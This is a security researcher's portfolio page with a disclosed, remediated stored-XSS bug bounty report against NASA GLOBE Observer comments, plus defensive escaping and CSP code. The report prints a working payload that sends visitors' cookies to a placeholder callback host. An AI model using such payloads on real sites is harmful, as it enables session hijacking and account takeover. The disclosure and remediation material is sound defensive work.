GARRETT KOHLRUSCH // BLAINE, MN // HUNTING

I find what shouldn't be there.

Security researcher specializing in offensive security, web application testing, and vulnerability discovery through responsible disclosure and bug bounty programs. Operator of GK Data LLC — a consultancy built around hunter-mentality testing, accurate findings, and clean remediation paths.
Findings · 100+
CVE · #?Soon?
Halls of Fame · 10+
Cumulative · ~$35k+

A hunter's approach to offensive security — built after hours, proven in production.

I'm a security researcher with 5+ years of hands-on web application testing and 100+ validated vulnerabilities across Fortune 500 companies, U.S. government systems, and major consumer platforms.

My core discipline is web and API offensive security: IDOR exploitation, authentication bypass, stored XSS with session exfiltration, CORS misconfiguration, SSRF escalation, JavaScript source analysis, and chained-impact reporting. I don't stop at the first PoC — I push until the real impact is on the page.

Alongside full-time work, I operate GK Data LLC, a cybersecurity consultancy delivering penetration tests and vulnerability assessments. I ship open-source tooling for the bug bounty community, write methodology breakdowns, and maintain active engagements on private Bugcrowd programs targeting critical infrastructure and consumer-scale platforms.

Currently open to security research, application security, and offensive security engineering roles — remote or on-site — in environments where security is taken seriously and research is encouraged.

Open to Work · Remote / Hybrid · W-2 or Contract · US-Based

Organizations that have acknowledged my vulnerability research through public hall-of-fame listings, letters of appreciation, or private program recognition.

Apple Hall of Fame
TheTradeDesk Hall of Fame
NASA Hall of Fame
StateFarm Hall of Fame
Meta Accepted Report
Microsoft Accepted Report

Redacted summaries of disclosed and remediated research. Target names withheld where required by program disclosure policy.

P2 · HIGH

Stored XSS in Comment Field of Observation – Leads to Cookie Theft and JS Execution

NASA GLOBE Observer Mobile App / Web - Stored XSS Vulnerability

Affected Endpoint

https://www.globe.gov/web/

Affected Feature

Observation Comments (Publicly Shared)

Summary

A stored XSS vulnerability was discovered in the comment field of shared observations within the NASA GLOBE Observer mobile app. By injecting malicious HTML/JS code in the comment, I was able to execute JavaScript in the browser context of any user viewing the observation. The payload was executed automatically upon page load and was reflected on public/shared observation pages. This allows full session hijacking and account compromise, especially due to the ability to exfiltrate session cookies to an external server.

Steps to Reproduce

  1. Install the NASA GLOBE Observer mobile app.
  2. Create or select any observation. I chose tree measurement and just took random photos on the observer app for latest iOS—this renders on the web version of viewing observations globally.
  3. In the "comment" field, input the following payload:
    <img src=x onerror="new Image().src='https://CALLBACKURLHERE?cb='+encodeURIComponent(document.cookie)">
    
  4. Submit the observation.
  5. Visit the observation's public/shareable URL (e.g., https://www.globe.gov/web/lightrip/...) from any other account or incognito session.
  6. Upon loading the page, the script:
    • Executes automatically
    • Sends the user's cookies to the attacker's server
    • Demonstrates persistent stored XSS shared across all users

Impact

  • Stored XSS across all users
  • Full session hijacking via stolen cookies
  • Arbitrary JS execution in NASA user sessions
  • Persistent across shared/public observation URLs
  • Could be chained for full account takeover or privilege escalation

Suggested Fix

  • Sanitize all input in comment fields to disallow any HTML tags or JavaScript
  • Encode all user-generated content before rendering
  • Use a JavaScript sanitization library like DOMPurify on the client-side, and enforce HTML escaping on the server-side
  • Apply CSP headers to mitigate risk of inline script execution
Full disclosure: https://bugcrowd.com/disclosures/f2f4a65f-b225-4a0e-b018-104b8793ae5e/stored-xss-in-comment-field-of-observation-leads-to-cookie-theft-and-js-execution
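The remediation items above carried into working code, as an added example that is not code from the report or from the GLOBE project: a server-side encode-before-render step, a check that the encoded text can no longer open a tag, and a Content-Security-Policy that refuses inline scripts and event handlers. The function names (escapeHtml, isInertText, renderComment, buildCsp), the comment object shape, the class name, and the nonce value are all assumptions made for this example; the sample comment is constructed to mirror the shape of the payload in the report, with a placeholder host instead of a callback.

```javascript
// Added example, not the report's or the GLOBE project's code: the remediation
// steps carried into a server-side render path plus a CSP header.

// The five characters that let text break out of an HTML text or attribute context.
const HTML_ESCAPES = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#39;',
};

// Encode user-supplied text so the browser shows it literally instead of parsing
// it as markup. This is the server-side "encode before rendering" step.
function escapeHtml(input) {
  return String(input).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// True when a string contains no raw characters that could open a tag or close
// an attribute; used to verify the encoding step on its own output.
function isInertText(s) {
  return !/[<>"']/.test(s);
}

// Render one observation comment into the page. Every interpolation of
// user-controlled data goes through escapeHtml(); nothing is inserted raw.
// (The comment object shape and the class name are assumed for this example.)
function renderComment(comment) {
  return `<p class="observation-comment">${escapeHtml(comment.text)}</p>`;
}

// Build a Content-Security-Policy value that refuses inline scripts and inline
// event handlers, so a tag that did reach the DOM could not execute code.
// `nonce` is an assumed per-response random value attached to the site's own
// <script> tags; it must not be predictable or reused across responses.
function buildCsp(nonce) {
  return [
    "default-src 'self'",
    `script-src 'self' 'nonce-${nonce}'`,
    "object-src 'none'",
    "base-uri 'self'",
  ].join('; ');
}

// Constructed sample input shaped like the payload in the report; the host is a
// placeholder, not a real callback endpoint.
const sampleComment = {
  text: '<img src=x onerror="new Image().src=\'https://EXAMPLE-CALLBACK/?cb=\'+document.cookie">',
};

// Run the encode step and the CSP builder over the constructed sample and return
// everything worth checking.
function demo() {
  const html = renderComment(sampleComment);
  const csp = buildCsp('r4nd0mN0nce');
  return { html, csp, inert: isInertText(escapeHtml(sampleComment.text)) };
}

const result = demo();
console.log(result.html);
console.log('Content-Security-Policy:', result.csp);
console.log('encoded comment free of markup characters:', result.inert);
```

escapeHtml() is the right tool only for HTML text and quoted attribute contexts; user data dropped into a JavaScript string, a URL, or a CSS value needs the encoder for that context instead. The DOMPurify step from the fix list belongs on the client when rich text must be preserved; when comments are plain text, encoding everything as above is the simpler and stronger choice, and the CSP remains a second layer rather than a substitute for either.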
IMPACT: Full session takeover
VRT: Stored XSS
VECTOR: User entered input
STATUS: Remediated
↳ ON TOTALS: Findings distribution across 100+ submissions — Server Security Misconfiguration (21), Server-Side Injection (12), XSS (9), AI Application Security (2), Application-Level DoS (2), Broken Access Control (1), Sensitive Data Exposure (1), Cloud Security (1), Unvalidated Redirects (1). Surfaces tested: 34× Web App, 4× API, 2× Network, 1× iOS. These counts are not exact, since NDA-bound and private-program findings cannot be listed.
BB Header Manager
  • Add unlimited custom headers
  • One-click enable/disable toggle
  • Quick presets (X-Bug-Bounty, X-HackerOne, X-Bugcrowd)
Chrome Web Store →
CompTIA Security+
JUN 2025 — JUN 2028
ID · S61PE3EQXMR4SRSJ
CompTIA Network+
APR 2025 — APR 2028
ID · KP0777KYRJF4Q43Q
IBM Cybersecurity Analyst Specialization
MAY 2022
ID · 3LNW8P3Q9WSC

Have a target that needs a closer look?

Available for full-time security research, application security, and offensive security engineering roles — as well as contract consulting engagements through GK Data LLC.